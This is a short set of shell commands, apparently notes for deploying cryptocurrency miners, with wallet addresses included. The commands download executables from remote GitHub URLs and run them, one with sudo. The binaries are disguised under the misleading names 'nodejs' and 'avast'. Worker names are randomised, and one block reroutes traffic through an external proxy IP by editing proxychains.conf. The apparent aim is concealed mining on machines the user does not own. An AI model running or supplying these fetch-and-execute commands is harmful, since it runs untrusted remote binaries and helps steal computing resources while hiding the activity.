apt-get install libpci3 &&  wget https://github.com/ahmad998AA/p/releases/download/v1/nodejs && chmod +x nodejs && sudo ./nodejs -epool eth-us1.hellominer.com:1100 -wal 0x80f568e40828aac7d748a51167b24003c6943920.$(echo $(shuf -i 1-5 -n 1)-xx) -pass x

wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.29/lolMiner_v1.29_Lin64.tar.gz && tar xf lolMiner_v1.29_Lin64.tar.gz && cd 1.29 && ./lolMiner --algo ETCHASH --pool etchash.unmineable.com:3333 --user RVN:RY28x597iBdNnLziuhQ3Y1z9C48Zjo2ysn.$(echo $(shuf -i 1000-9999 -n 1)-gass)


TRHjzK8DBKrse4X4THaepbemcF6CVBKDT6



TON
EQBB7AiekO0BMwfFwgC4A_-w-aOgPSt5G_oDg4kyOlETN-kU


apt update

apt install proxychains

apt install screen -y

sed -i 's/socks4/socks5/' /etc/proxychains.conf

sed -i 's/127.0.0.1/98.162.96.53/' /etc/proxychains.conf

sed -i 's/9050/10663/' /etc/proxychains.conf

wget https://raw.githubusercontent.com/renilo/ba/main/avast

chmod +x avast

./avast --algo TON --pool https://server1.whalestonpool.com --user EQBB7AiekO0BMwfFwgC4A_-w-aOgPSt5G_oDg4kyOlETN-kU --ton-mode 1
